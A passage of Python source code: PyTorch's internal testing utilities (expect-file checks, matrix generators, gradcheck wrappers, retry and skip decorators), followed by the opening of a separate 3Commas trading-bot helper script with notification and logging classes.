# lives, NOT where test/common_utils.py lives. This doesn't matter in
# PyTorch where all test scripts are in the same directory as
# test/common_utils.py, but it matters in onnx-pytorch
module_id = self.__class__.__module__
munged_id = remove_prefix(self.id(), module_id + ".")
test_file = os.path.realpath(sys.modules[module_id].__file__)
expected_file = os.path.join(os.path.dirname(test_file),
"expect",
munged_id)
subname_output = ""
if subname:
expected_file += "-" + subname
subname_output = " ({})".format(subname)
expected_file += ".expect"
expected = None
def accept_output(update_type):
print("Accepting {} for {}{}:\n\n{}".format(update_type, munged_id, subname_output, s))
with open(expected_file, 'w') as f:
# Adjust for producer_version, leave s unmodified
s_tag = re.sub(r'(producer_version): "[0-9.]*"',
r'\1: "CURRENT_VERSION"', s)
f.write(s_tag)
try:
with open(expected_file) as f:
expected = f.read()
except IOError as e:
if e.errno != errno.ENOENT:
raise
elif expecttest.ACCEPT:
return accept_output("output")
else:
raise RuntimeError(
("I got this output for {}{}:\n\n{}\n\n"
"No expect file exists; to accept the current output, run:\n"
"python {} {} --accept").format(munged_id, subname_output, s, __main__.__file__, munged_id)) from None
# a hack for JIT tests
if IS_WINDOWS:
expected = re.sub(r'CppOp\[(.+?)\]', 'CppOp[]', expected)
s = re.sub(r'CppOp\[(.+?)\]', 'CppOp[]', s)
# Adjust for producer_version
expected = expected.replace(
'producer_version: "CURRENT_VERSION"',
'producer_version: "{}"'.format(torch.onnx.producer_version)
)
if expecttest.ACCEPT:
if expected != s:
return accept_output("updated output")
else:
if hasattr(self, "assertMultiLineEqual"):
# Python 2.7 only
# NB: Python considers lhs "old" and rhs "new".
self.assertMultiLineEqual(expected, s)
else:
self.assertEqual(s, expected)
def assertExpectedStripMangled(self, s, subname=None):
s = re.sub(r'__torch__[^ ]+', '', s)
self.assertExpected(s, subname)
def assertGreaterAlmostEqual(self, first, second, places=None, msg=None, delta=None):
"""Assert that ``first`` is greater than or almost equal to ``second``.
The equality of ``first`` and ``second`` is determined in a similar way to
the ``assertAlmostEqual`` function of the standard library.
"""
if delta is not None and places is not None:
raise TypeError("specify delta or places not both")
if first >= second:
return
diff = second - first
if delta is not None:
if diff <= delta:
return
standardMsg = f"{first} not greater than or equal to {second} within {delta} delta"
else:
if places is None:
places = 7
if round(diff, places) == 0:
return
standardMsg = f"{first} not greater than or equal to {second} within {places} places"
msg = self._formatMessage(msg, standardMsg)
raise self.failureException(msg)
# run code in subprocess and capture exceptions.
@staticmethod
def run_process_no_exception(code, env=None):
import subprocess
popen = subprocess.Popen(
[sys.executable, '-c', code],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env=env)
(stdout, stderr) = popen.communicate()
return (stdout, stderr)
# returns captured stderr
@staticmethod
def runWithPytorchAPIUsageStderr(code):
env = os.environ.copy()
env["PYTORCH_API_USAGE_STDERR"] = "1"
# remove IN_CI flag since this is a wrapped test process.
# IN_CI flag should be set in the parent process only.
if "IN_CI" in env.keys():
del env["IN_CI"]
(stdout, stderr) = TestCase.run_process_no_exception(code, env=env)
return stderr.decode('ascii')
def download_file(url, binary=True):
from urllib.parse import urlsplit
from urllib import request, error
filename = os.path.basename(urlsplit(url)[2])
data_dir = get_writable_path(os.path.join(os.path.dirname(__file__), 'data'))
path = os.path.join(data_dir, filename)
if os.path.exists(path):
return path
try:
data = request.urlopen(url, timeout=15).read()
with open(path, 'wb' if binary else 'w') as f:
f.write(data)
return path
except error.URLError as e:
msg = "could not download test file '{}'".format(url)
warnings.warn(msg, RuntimeWarning)
raise unittest.SkipTest(msg) from e
def find_free_port():
"""
Finds an available port and returns that port number.
NOTE: If this function is being used to allocate a port to Store (or
indirectly via init_process_group or init_rpc), it should be used
in conjuction with the `retry_on_connect_failures` decorator as there is a potential
race condition where the allocated port may become unavailable before it can be used
"""
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as sock:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(('localhost', 0))
_, port = sock.getsockname()
return port
# Errors that we can get in c10d initialization for which we should retry tests for.
ADDRESS_IN_USE = "Address already in use"
CONNECT_TIMEOUT = "connect() timed out."
def retry_on_connect_failures(func=None, connect_errors=(ADDRESS_IN_USE)):
"""Reruns a test if the test returns a RuntimeError and the exception
contains one of the strings in connect_errors."""
# This if block is executed when using this function as a decorator with arguments.
if func is None:
return partial(retry_on_connect_failures, connect_errors=connect_errors)
@wraps(func)
def wrapper(*args, **kwargs):
n_retries = 10
tries_remaining = n_retries
while True:
try:
return func(*args, **kwargs)
except RuntimeError as error:
if any(connect_error in str(error) for connect_error in connect_errors):
tries_remaining -= 1
if tries_remaining == 0:
raise RuntimeError(f"Failing after {n_retries} retries with error: {str(error)}")
time.sleep(random.random())
continue
raise
return wrapper
# Decorator to retry upon certain Exceptions.
def retry(ExceptionToCheck, tries=3, delay=3, skip_after_retries=False):
def deco_retry(f):
@wraps(f)
def f_retry(*args, **kwargs):
mtries, mdelay = tries, delay
while mtries > 1:
try:
return f(*args, **kwargs)
except ExceptionToCheck as e:
msg = "%s, Retrying in %d seconds..." % (str(e), mdelay)
print(msg)
time.sleep(mdelay)
mtries -= 1
try:
return f(*args, **kwargs)
except ExceptionToCheck as e:
raise unittest.SkipTest(f"Skipping after {tries} consecutive {str(e)}") from e if skip_after_retries else e
return f_retry # true decorator
return deco_retry
# Methods for matrix generation
def random_square_matrix_of_rank(l, rank, dtype=torch.double, device='cpu'):
assert rank <= l
A = torch.randn(l, l, dtype=dtype, device=device)
u, s, vh = torch.linalg.svd(A, full_matrices=False)
for i in range(l):
if i >= rank:
s[i] = 0
elif s[i] == 0:
s[i] = 1
return (u * s.to(dtype).unsqueeze(-2)) @ vh
def random_well_conditioned_matrix(*shape, dtype, device, mean=1.0, sigma=0.001):
"""
Returns a random rectangular matrix (batch of matrices)
with singular values sampled from a Gaussian with
mean `mean` and standard deviation `sigma`.
The smaller the `sigma`, the better conditioned
the output matrix is.
"""
primitive_dtype = {
torch.float: torch.float,
torch.double: torch.double,
torch.cfloat: torch.float,
torch.cdouble: torch.double
}
x = torch.rand(shape, dtype=dtype, device=device)
m = x.size(-2)
n = x.size(-1)
u, _, vh = torch.linalg.svd(x, full_matrices=False)
s = (torch.randn(*(shape[:-2] + (min(m, n),)), dtype=primitive_dtype[dtype], device=device) * sigma + mean) \
.sort(-1, descending=True).values.to(dtype)
return (u * s.unsqueeze(-2)) @ vh
# Returns a noncontiguous (tensor with the same shape and values as t
# The noncontiguous tensor is constructed such that elements in the innermost
# dimension are separated by zeros or (whenever possible) nans
# TODO: consider more complicated noncontiguity schemes
def noncontiguous_like(t):
# Short-circuits if t is already noncontiguous
if not t.is_contiguous():
return t
# Special-cases 0-dim tensors
if t.ndim == 0:
result = t.detach().unsqueeze(0).repeat_interleave(2, dim=-1)
if t.dtype.is_floating_point or t.dtype.is_complex:
result[0] = math.nan
else:
result[0] = 0
result.set_(result.storage(), 1, t.size(), ())
result.requires_grad_(t.requires_grad)
return result
# 1+ dim tensor case
result = torch.repeat_interleave(t.detach(), 2, dim=-1)
if t.dtype.is_floating_point or t.dtype.is_complex:
result[..., 1::2] = math.nan
else:
result[..., 1::2] = 0
strides = list(result.stride())
strides[-1] = strides[-1] * 2
result.set_(result.storage(), result.storage_offset(), t.size(), stride=tuple(strides))
result.requires_grad_(t.requires_grad)
return result
# TODO: remove this (prefer make_symmetric_matrices below)
def random_symmetric_matrix(l, *batches, **kwargs):
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
A = torch.randn(*(batches + (l, l)), dtype=dtype, device=device)
A = (A + A.mT).div_(2)
return A
# Creates a symmetric matrix or batch of symmetric matrices
# Shape must be a square matrix or batch of square matrices
def make_symmetric_matrices(*shape, device, dtype):
assert shape[-1] == shape[-2]
t = make_tensor(shape, device=device, dtype=dtype)
t = (t + t.mT).div_(2)
return t
def random_hermitian_matrix(l, *batches, **kwargs):
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
A = torch.randn(*(batches + (l, l)), dtype=dtype, device=device)
A = (A + A.mH).div_(2)
return A
def random_symmetric_psd_matrix(l, *batches, **kwargs):
"""
Returns a batch of random symmetric positive-semi-definite matrices.
The shape of the result is batch_dims + (matrix_size, matrix_size)
The following example creates a tensor of size 2 x 4 x 3 x 3
>>> matrices = random_symmetric_psd_matrix(3, 2, 4, dtype=dtype, device=device)
"""
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
A = torch.randn(*(batches + (l, l)), dtype=dtype, device=device)
return A @ A.mT
def random_hermitian_psd_matrix(matrix_size, *batch_dims, dtype=torch.double, device='cpu'):
"""
Returns a batch of random Hermitian positive-semi-definite matrices.
The shape of the result is batch_dims + (matrix_size, matrix_size)
The following example creates a tensor of size 2 x 4 x 3 x 3
>>> matrices = random_hermitian_psd_matrix(3, 2, 4, dtype=dtype, device=device)
"""
A = torch.randn(*(batch_dims + (matrix_size, matrix_size)), dtype=dtype, device=device)
return A @ A.mH
# TODO: remove this (prefer make_symmetric_pd_matrices below)
def random_symmetric_pd_matrix(matrix_size, *batch_dims, **kwargs):
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
A = torch.randn(*(batch_dims + (matrix_size, matrix_size)),
dtype=dtype, device=device)
return torch.matmul(A, A.mT) \
+ torch.eye(matrix_size, dtype=dtype, device=device) * 1e-5
# Creates a symmetric positive-definite matrix or batch of
# such matrices
def make_symmetric_pd_matrices(*shape, device, dtype):
assert shape[-1] == shape[-2]
t = make_tensor(shape, device=device, dtype=dtype)
i = torch.eye(shape[-1], device=device, dtype=dtype) * 1e-5
return t @ t.mT + i
def random_hermitian_pd_matrix(matrix_size, *batch_dims, dtype, device):
"""
Returns a batch of random Hermitian positive-definite matrices.
The shape of the result is batch_dims + (matrix_size, matrix_size)
The following example creates a tensor of size 2 x 4 x 3 x 3
>>> matrices = random_hermitian_pd_matrix(3, 2, 4, dtype=dtype, device=device)
"""
A = torch.randn(*(batch_dims + (matrix_size, matrix_size)),
dtype=dtype, device=device)
return A @ A.mH + torch.eye(matrix_size, dtype=dtype, device=device)
# TODO: remove this (prefer make_fullrank_matrices_with_distinct_singular_values below)
def random_fullrank_matrix_distinct_singular_value(matrix_size, *batch_dims,
**kwargs):
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
silent = kwargs.get("silent", False)
if silent and not torch._C.has_lapack:
return torch.ones(matrix_size, matrix_size, dtype=dtype, device=device)
A = torch.randn(batch_dims + (matrix_size, matrix_size), dtype=dtype, device=device)
u, _, vh = torch.linalg.svd(A, full_matrices=False)
real_dtype = A.real.dtype if A.dtype.is_complex else A.dtype
s = torch.arange(1., matrix_size + 1, dtype=real_dtype, device=device).mul_(1.0 / (matrix_size + 1))
return (u * s.to(A.dtype)) @ vh
# Creates a full rank matrix with distinct signular values or
# a batch of such matrices
def make_fullrank_matrices_with_distinct_singular_values(*shape, device, dtype, requires_grad=False):
with torch.no_grad():
t = make_tensor(shape, device=device, dtype=dtype)
u, _, vh = torch.linalg.svd(t, full_matrices=False)
# TODO: improve the handling of complex tensors here
real_dtype = t.real.dtype if t.dtype.is_complex else t.dtype
k = min(shape[-1], shape[-2])
s = torch.arange(1., k + 1, dtype=real_dtype, device=device).mul_(1.0 / (k + 1))
x = (u * s.to(dtype)) @ vh
x.requires_grad_(requires_grad)
return x
def random_matrix(rows, columns, *batch_dims, **kwargs):
"""Return rectangular matrix or batches of rectangular matrices.
Parameters:
dtype - the data type
device - the device kind
singular - when True, the output will be singular
"""
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
silent = kwargs.get("silent", False)
singular = kwargs.get("singular", False)
if silent and not torch._C.has_lapack:
return torch.ones(rows, columns, dtype=dtype, device=device)
A = torch.randn(batch_dims + (rows, columns), dtype=dtype, device=device)
if A.numel() == 0:
return A
u, _, vh = torch.linalg.svd(A, full_matrices=False)
k = min(rows, columns)
s = torch.linspace(1 / (k + 1), 1, k, dtype=dtype, device=device)
if singular:
# make matrix singular
s[k - 1] = 0
if k > 2:
# increase the order of singularity so that the pivoting
# in LU factorization will be non-trivial
s[0] = 0
return (u * s.unsqueeze(-2)) @ vh
def random_lowrank_matrix(rank, rows, columns, *batch_dims, **kwargs):
"""Return rectangular matrix or batches of rectangular matrices with
given rank.
"""
B = random_matrix(rows, rank, *batch_dims, **kwargs)
C = random_matrix(rank, columns, *batch_dims, **kwargs)
return B.matmul(C)
def random_sparse_matrix(rows, columns, density=0.01, **kwargs):
"""Return rectangular random sparse matrix within given density.
The density of the result approaches to given density as the size
of the matrix is increased and a relatively small value of density
is specified but higher than min(rows, columns)/(rows * columns)
for non-singular matrices.
"""
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
singular = kwargs.get("singular", False)
k = min(rows, columns)
nonzero_elements = max(min(rows, columns), int(rows * columns * density))
row_indices = [i % rows for i in range(nonzero_elements)]
column_indices = [i % columns for i in range(nonzero_elements)]
random.shuffle(column_indices)
indices = [row_indices, column_indices]
values = torch.randn(nonzero_elements, dtype=dtype, device=device)
# ensure that the diagonal dominates
values *= torch.tensor([-float(i - j)**2 for i, j in zip(*indices)], dtype=dtype, device=device).exp()
indices_tensor = torch.tensor(indices)
A = torch.sparse_coo_tensor(indices_tensor, values, (rows, columns), device=device)
return A.coalesce()
def random_sparse_pd_matrix(matrix_size, density=0.01, **kwargs):
"""Return random sparse positive-definite matrix with given density.
The eigenvalues of the matrix are defined as::
arange(1, matrix_size+1)/matrix_size
Algorithm:
A = diag(arange(1, matrix_size+1)/matrix_size)
while <A density is smaller than required>:
<choose random i, j in range(matrix_size), theta in [0, 2*pi]>
R = <rotation matrix (i,j,theta)>
A = R^T A R
"""
import math
torch = kwargs.get('torch', globals()['torch'])
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
data = dict([((i, i), float(i + 1) / matrix_size)
for i in range(matrix_size)])
def multiply(data, N, i, j, cs, sn, left=True):
for k in range(N):
if left:
ik, jk = (k, i), (k, j)
else:
ik, jk = (i, k), (j, k)
aik, ajk = data.get(ik, 0), data.get(jk, 0)
aik, ajk = cs * aik + sn * ajk, -sn * aik + cs * ajk
if aik:
data[ik] = aik
else:
data.pop(ik, None)
if ajk:
data[jk] = ajk
else:
data.pop(jk, None)
target_nnz = density * matrix_size * matrix_size
while len(data) < target_nnz:
i = random.randint(0, matrix_size - 1)
j = random.randint(0, matrix_size - 1)
if i != j:
theta = random.uniform(0, 2 * math.pi)
cs = math.cos(theta)
sn = math.sin(theta)
multiply(data, matrix_size, i, j, cs, sn, left=True)
multiply(data, matrix_size, i, j, cs, sn, left=False)
icoords, jcoords, values = [], [], []
for (i, j), v in sorted(data.items()):
icoords.append(i)
jcoords.append(j)
values.append(v)
indices_tensor = torch.tensor([icoords, jcoords])
return torch.sparse_coo_tensor(indices_tensor, values, (matrix_size, matrix_size), dtype=dtype, device=device)
def do_test_dtypes(self, dtypes, layout, device):
for dtype in dtypes:
if dtype != torch.float16:
out = torch.zeros((2, 3), dtype=dtype, layout=layout, device=device)
self.assertIs(dtype, out.dtype)
self.assertIs(layout, out.layout)
self.assertEqual(device, out.device)
def do_test_empty_full(self, dtypes, layout, device):
shape = torch.Size([2, 3])
def check_value(tensor, dtype, layout, device, value, requires_grad):
self.assertEqual(shape, tensor.shape)
self.assertIs(dtype, tensor.dtype)
self.assertIs(layout, tensor.layout)
self.assertEqual(tensor.requires_grad, requires_grad)
if tensor.is_cuda and device is not None:
self.assertEqual(device, tensor.device)
if value is not None:
fill = tensor.new(shape).fill_(value)
self.assertEqual(tensor, fill)
def get_int64_dtype(dtype):
module = '.'.join(str(dtype).split('.')[1:-1])
if not module:
return torch.int64
return operator.attrgetter(module)(torch).int64
default_dtype = torch.get_default_dtype()
check_value(torch.empty(shape), default_dtype, torch.strided, -1, None, False)
check_value(torch.full(shape, -5.), default_dtype, torch.strided, -1, None, False)
for dtype in dtypes:
for rg in {dtype.is_floating_point, False}:
int64_dtype = get_int64_dtype(dtype)
v = torch.empty(shape, dtype=dtype, device=device, layout=layout, requires_grad=rg)
check_value(v, dtype, layout, device, None, rg)
out = v.new()
check_value(torch.empty(shape, out=out, device=device, layout=layout, requires_grad=rg),
dtype, layout, device, None, rg)
check_value(v.new_empty(shape), dtype, layout, device, None, False)
check_value(v.new_empty(shape, dtype=int64_dtype, device=device, requires_grad=False),
int64_dtype, layout, device, None, False)
check_value(torch.empty_like(v), dtype, layout, device, None, False)
check_value(torch.empty_like(v, dtype=int64_dtype, layout=layout, device=device, requires_grad=False),
int64_dtype, layout, device, None, False)
if dtype is not torch.float16 and layout != torch.sparse_coo:
fv = 3
v = torch.full(shape, fv, dtype=dtype, layout=layout, device=device, requires_grad=rg)
check_value(v, dtype, layout, device, fv, rg)
check_value(v.new_full(shape, fv + 1), dtype, layout, device, fv + 1, False)
out = v.new()
check_value(torch.full(shape, fv + 2, out=out, device=device, layout=layout, requires_grad=rg),
dtype, layout, device, fv + 2, rg)
check_value(v.new_full(shape, fv + 3, dtype=int64_dtype, device=device, requires_grad=False),
int64_dtype, layout, device, fv + 3, False)
check_value(torch.full_like(v, fv + 4), dtype, layout, device, fv + 4, False)
check_value(torch.full_like(v, fv + 5,
dtype=int64_dtype, layout=layout, device=device, requires_grad=False),
int64_dtype, layout, device, fv + 5, False)
# this helper method is to recursively
# clone the tensor-type input of operators tested by OpInfo
def clone_input_helper(input):
if isinstance(input, torch.Tensor):
return torch.clone(input)
if isinstance(input, Sequence):
return tuple(map(clone_input_helper, input))
return input
THESE_TAKE_WAY_TOO_LONG = {
'test_Conv3d_groups',
'test_conv_double_backward',
'test_conv_double_backward_groups',
'test_Conv3d_dilated',
'test_Conv3d_stride_padding',
'test_Conv3d_dilated_strided',
'test_Conv3d',
'test_Conv2d_dilated',
'test_ConvTranspose3d_dilated',
'test_ConvTranspose2d_dilated',
'test_snli',
'test_Conv2d',
'test_Conv2d_padding',
'test_ConvTranspose2d_no_bias',
'test_ConvTranspose2d',
'test_ConvTranspose3d',
'test_Conv2d_no_bias',
'test_matmul_4d_4d',
'test_multinomial_invalid_probs',
}
running_script_path = None
def set_running_script_path():
global running_script_path
try:
running_file = os.path.abspath(os.path.realpath(sys.argv[0]))
if running_file.endswith('.py'): # skip if the running file is not a script
running_script_path = running_file
except Exception:
pass
def check_test_defined_in_running_script(test_case):
if running_script_path is None:
return
test_case_class_file = os.path.abspath(os.path.realpath(inspect.getfile(test_case.__class__)))
assert test_case_class_file == running_script_path, "Class of loaded TestCase \"{}\" " \
"is not defined in the running script \"{}\", but in \"{}\". Did you " \
"accidentally import a unittest.TestCase from another file?".format(
test_case.id(), running_script_path, test_case_class_file)
def load_tests(loader, tests, pattern):
set_running_script_path()
test_suite = unittest.TestSuite()
for test_group in tests:
for test in test_group:
check_test_defined_in_running_script(test)
test_suite.addTest(test)
return test_suite
class BytesIOContext(io.BytesIO):
def __enter__(self):
return self
def __exit__(self, *args):
pass
# Tentative value for nondet_tol for gradcheck when backward implementation
# relies on nondeterministic operations, i.e., those listed here:
# https://pytorch.org/docs/stable/generated/torch.use_deterministic_algorithms.html
#
# For more information see https://github.com/pytorch/pytorch/issues/56202
GRADCHECK_NONDET_TOL = 1e-12
def gradcheck(fn, inputs, **kwargs):
# Wrapper around gradcheck that enables certain keys by default.
# Use this testing-internal gradcheck instead of autograd.gradcheck so that new features like vmap and
# forward-mode AD are tested by default. We create this wrapper because we'd like to keep new checks
# to be disabled to default for the public-facing api to avoid breaking user code.
#
# All PyTorch devs doing testing should use this wrapper instead of autograd.gradcheck.
default_values = {
"check_batched_grad": True,
"fast_mode": True,
}
if os.environ.get('PYTORCH_TEST_WITH_SLOW_GRADCHECK', "0FF") == "ON":
default_values["fast_mode"] = False
for key, value in default_values.items():
# default value override values explicitly set to None
k = kwargs.get(key, None)
kwargs[key] = k if k is not None else value
return torch.autograd.gradcheck(fn, inputs, **kwargs)
def gradgradcheck(fn, inputs, grad_outputs=None, **kwargs):
# Wrapper around gradgradcheck that enables certain keys by default
# See gradcheck above for an explanation of why we need something like this.
#
# All PyTorch devs doing testing should use this wrapper instead of autograd.gradgradcheck
default_values = {
"check_batched_grad": True,
"fast_mode": True,
}
if os.environ.get('PYTORCH_TEST_WITH_SLOW_GRADCHECK', "0FF") == "ON":
default_values["fast_mode"] = False
for key, value in default_values.items():
# default value override values explicitly set to None
k = kwargs.get(key, None)
kwargs[key] = k if k is not None else value
return torch.autograd.gradgradcheck(fn, inputs, grad_outputs, **kwargs)
def _assertGradAndGradgradChecks(test_case, apply_fn, inputs, **kwargs):
# call assert function rather than returning a bool since it's nicer
# if we get whether this failed on the gradcheck or the gradgradcheck.
test_case.assertTrue(gradcheck(apply_fn, inputs, **kwargs))
test_case.assertTrue(gradgradcheck(apply_fn, inputs, **kwargs))
@contextmanager
def set_cwd(path: str) -> Iterator[None]:
old_cwd = os.getcwd()
try:
os.chdir(path)
yield
finally:
os.chdir(old_cwd)
# Using @precisionOverride specific to your test is the recommended way
# of doing this. These are just some values that worked for test_nn.
dtype2prec_DONTUSE = {torch.float: 1e-5,
torch.double: 1e-5,
torch.half: 1e-2,
torch.bfloat16: 1e-1}
def _wrap_warn_once(regex):
def decorator(fn):
def inner(self, *args, **kwargs):
with self.assertWarnsOnceRegex(UserWarning, regex):
fn(self, *args, **kwargs)
return inner
return decorator
# This is a wrapper that wraps a test to run this test twice, one with
# coalesced=True, another with coalesced=False for coalesced/uncoalesced sparse tensors.
def coalescedonoff(f):
@wraps(f)
def wrapped(self, *args, **kwargs):
f(self, *args, **kwargs, coalesced=True)
f(self, *args, **kwargs, coalesced=False)
return wrapped
@contextlib.contextmanager
def disable_gc():
if gc.isenabled():
try:
gc.disable()
yield
finally:
gc.enable()
else:
yield
def find_library_location(lib_name: str) -> Path:
# return the shared library file in the installed folder if exist,
# else the file in the build folder
torch_root = Path(torch.__file__).resolve().parent
path = torch_root / 'lib' / lib_name
if os.path.exists(path):
return path
torch_root = Path(__file__).resolve().parent.parent.parent
return torch_root / 'build' / 'lib' / lib_name
def sandcastle_skip(reason):
"""
Similar to unittest.skip, however in the sandcastle environment it just
"passes" the test instead to avoid creating tasks complaining about tests
skipping continuously.
"""
def decorator(func):
if not IS_SANDCASTLE:
func.__unittest_skip__ = True
func.__unittest_skip_why__ = reason
return func
@wraps(func)
def wrapper(*args, **kwargs):
print(f'Skipping {func.__name__} on sandcastle for following reason: {reason}', file=sys.stderr)
return
return wrapper
return decorator
def mock_wrapper(method):
"""
Returns a function that calls the real implementation of a method
in addition to passing args to a mock object.
"""
mock = MagicMock()
@wraps(method)
def wrapper(self, *args, **kwargs):
mock(*args, **kwargs)
return method(self, *args, **kwargs)
wrapper.mock = mock # type: ignore[attr-defined]
return wrapper
def get_tensors_from(args, kwargs):
""" Returns a set of all Tensor objects in the given args and kwargs. """
return set([arg for arg in args if isinstance(arg, Tensor)] +
[v for v in kwargs.values() if isinstance(v, Tensor)])
# Returns scalar tensor representation of a list of integer byte values
def bytes_to_scalar(byte_list: List[int], dtype: torch.dtype, device: torch.device):
dtype_to_ctype: Dict[torch.dtype, Any] = {
torch.int8: ctypes.c_int8,
torch.uint8: ctypes.c_uint8,
torch.int16: ctypes.c_int16,
torch.int32: ctypes.c_int32,
torch.int64: ctypes.c_int64,
torch.bool: ctypes.c_bool,
torch.float32: ctypes.c_float,
torch.complex64: ctypes.c_float,
torch.float64: ctypes.c_double,
torch.complex128: ctypes.c_double,
}
ctype = dtype_to_ctype[dtype]
num_bytes = ctypes.sizeof(ctype)
def check_bytes(byte_list):
for byte in byte_list:
assert 0 <= byte <= 255
if dtype.is_complex:
assert len(byte_list) == (num_bytes * 2)
check_bytes(byte_list)
real = ctype.from_buffer((ctypes.c_byte * num_bytes)(
*byte_list[:num_bytes])).value
imag = ctype.from_buffer((ctypes.c_byte * num_bytes)(
*byte_list[num_bytes:])).value
res = real + 1j * imag
else:
assert len(byte_list) == num_bytes
check_bytes(byte_list)
res = ctype.from_buffer((ctypes.c_byte * num_bytes)(
*byte_list)).value
return torch.tensor(res, device=device, dtype=dtype)
def has_breakpad():
# We always build with breakpad in CI
if IS_IN_CI:
return True
# If not on a special build, check that the library was actually linked in
try:
torch._C._get_minidump_directory() # type: ignore[attr-defined]
return True
except RuntimeError as e:
if "Minidump handler is uninintialized" in str(e):
return True
return False
def sandcastle_skip_if(condition, reason):
"""
Similar to unittest.skipIf, however in the sandcastle environment it just
"passes" the test instead to avoid creating tasks complaining about tests
skipping continuously.
"""
def decorator(func):
if not IS_SANDCASTLE and condition:
func.__unittest_skip__ = True
func.__unittest_skip_why__ = reason
return func
@wraps(func)
def wrapper(*args, **kwargs):
if condition and IS_SANDCASTLE:
print(f'Skipping {func.__name__} on sandcastle for following reason: {reason}', file=sys.stderr)
return
else:
return func(*args, **kwargs)
return wrapper
return decorator
def dtype_name(dtype):
""" Returns the pretty name of the dtype (e.g. torch.int64 -> int64). """
return str(dtype).split('.')[1]
def set_single_threaded_if_parallel_tbb(fn):
"""Set test to be single threaded for parallel tbb.
See https://github.com/pytorch/pytorch/issues/64571#issuecomment-914691883
"""
if not IS_TBB:
return fn
@wraps(fn)
def wrap_fn(*args, **kwargs):
num_threads = torch.get_num_threads()
torch.set_num_threads(1)
try:
return fn(*args, **kwargs)
finally:
torch.set_num_threads(num_threads)
return wrap_fn
@functools.lru_cache()
def get_cycles_per_ms() -> float:
"""Measure and return approximate number of cycles per millisecond for torch.cuda._sleep
"""
def measure() -> float:
start = torch.cuda.Event(enable_timing=True)
end = torch.cuda.Event(enable_timing=True)
start.record()
torch.cuda._sleep(1000000)
end.record()
end.synchronize()
cycles_per_ms = 1000000 / start.elapsed_time(end)
return cycles_per_ms
# Get 10 values and remove the 2 max and 2 min and return the avg.
# This is to avoid system disturbance that skew the results, e.g.
# the very first cuda call likely does a bunch of init, which takes
# much longer than subsequent calls.
#
# Tested on both Tesla V100, Quadro GP100, Titan RTX, RTX 3090 GPUs
# and seems to return stable values. Therefore, we enable caching
# using lru_cache decorator above.
num = 10
vals = []
for _ in range(num):
vals.append(measure())
vals = sorted(vals)
return mean(vals[2 : num - 2])
|
tpincrement.py
|
#!/usr/bin/env python3
"""Cyberjunky's 3Commas bot helpers."""
import argparse
import configparser
import json
import logging
import os
import queue
import sqlite3
import sys
import threading
import time
from logging.handlers import TimedRotatingFileHandler as _TimedRotatingFileHandler
from pathlib import Path
import apprise
from py3cw.request import Py3CW
class NotificationHandler:
"""Notification class."""
def __init__(self, enabled=False, notify_urls=None):
if enabled and notify_urls:
self.apobj = apprise.Apprise()
urls = json.loads(notify_urls)
for url in urls:
self.apobj.add(url)
self.queue = queue.Queue()
self.start_worker()
self.enabled = True
else:
self.enabled = False
def start_worker(self):
"""Start notification worker."""
threading.Thread(target=self.process_queue, daemon=True).start()
def process_queue(self):
"""Process the queue."""
while True:
message, attachments = self.queue.get()
if attachments:
self.apobj.notify(body=message, attach=attachments)
else:
self.apobj.notify(body=message)
self.queue.task_done()
def send_notification(self, message, attachments=None):
"""Send a notification if enabled."""
if self.enabled:
msg = f"[3Commas bots helper {program}]\n" + message
self.queue.put((msg, attachments or []))
class TimedRotatingFileHandler(_TimedRotatingFileHandler):
"""Override original code to fix bug with not deleting old logfiles."""
def __init__(self, filename="", when="midnight", interval=1, backupCount=7):
super().__init__(
filename=filename,
when=when,
interval=int(interval),
backupCount=int(backupCount),
)
def getFilesToDelete(self):
"""Find all logfiles present."""
dirname, basename = os.path.split(self.baseFilename)
filenames = os.listdir(dirname)
result = []
prefix = basename + "."
plen = len(prefix)
for filename in filenames:
if filename[:plen] == prefix:
suffix = filename[plen:]
if self.extMatch.match(suffix):
result.append(os.path.join(dirname, filename))
result.sort()
if len(result) < self.backupCount:
result = []
else:
result = result[: len(result) - self.backupCount]
return result
def doRollover(self):
"""Delete old logfiles but keep latest backupCount amount."""
super().doRollover()
self.close()
timetuple = time.localtime(time.time())
dfn = self.baseFilename + "." + time.strftime(self.suffix, timetuple)
if os.path.exists(dfn):
os.remove(dfn)
os.rename(self.baseFilename, dfn)
if self.backupCount > 0:
for oldlog in self.getFilesToDelete():
os.remove(oldlog)
self.stream = open(self.baseFilename, "w")
currenttime = int(time.time())
newrolloverat = self.computeRollover(currenttime)
while newrolloverat <= currenttime:
newrolloverat = newrolloverat + self.interval
self.rolloverAt = newrolloverat
class Logger:
"""Logger class."""
my_logger = None
def __init__(self, notificationhandler, logstokeep, debug_enabled, notify_enabled):
"""Logger init."""
self.my_logger = logging.getLogger()
self.notify_enabled = notify_enabled
self.notificationhandler = notificationhandler
if debug_enabled:
self.my_logger.setLevel(logging.DEBUG)
self.my_logger.propagate = False
else:
self.my_logger.setLevel(logging.INFO)
self.my_logger.propagate = False
date_fmt = "%Y-%m-%d %H:%M:%S"
formatter = logging.Formatter(
"%(asctime)s - %(filename)s - %(levelname)s - %(message)s", date_fmt
)
console_formatter = logging.Formatter(
"%(asctime)s - %(filename)s - %(message)s", date_fmt
)
# Create directory if not exists
if not os.path.exists(f"{datadir}/logs"):
os.makedirs(f"{datadir}/logs")
# Log to file and rotate if needed
file_handle = TimedRotatingFileHandler(
filename=f"{datadir}/logs/{program}.log", backupCount=logstokeep
)
file_handle.setFormatter(formatter)
self.my_logger.addHandler(file_handle)
# Log to console
console_handle = logging.StreamHandler()
console_handle.setLevel(logging.INFO)
console_handle.setFormatter(console_formatter)
self.my_logger.addHandler(console_handle)
def log(self, message, level="info"):
"""Call the log levels."""
if level == "info":
self.my_logger.info(message)
elif level == "warning":
self.my_logger.warning(message)
elif level == "error":
self.my_logger.error(message)
elif level == "debug":
self.my_logger.debug(message)
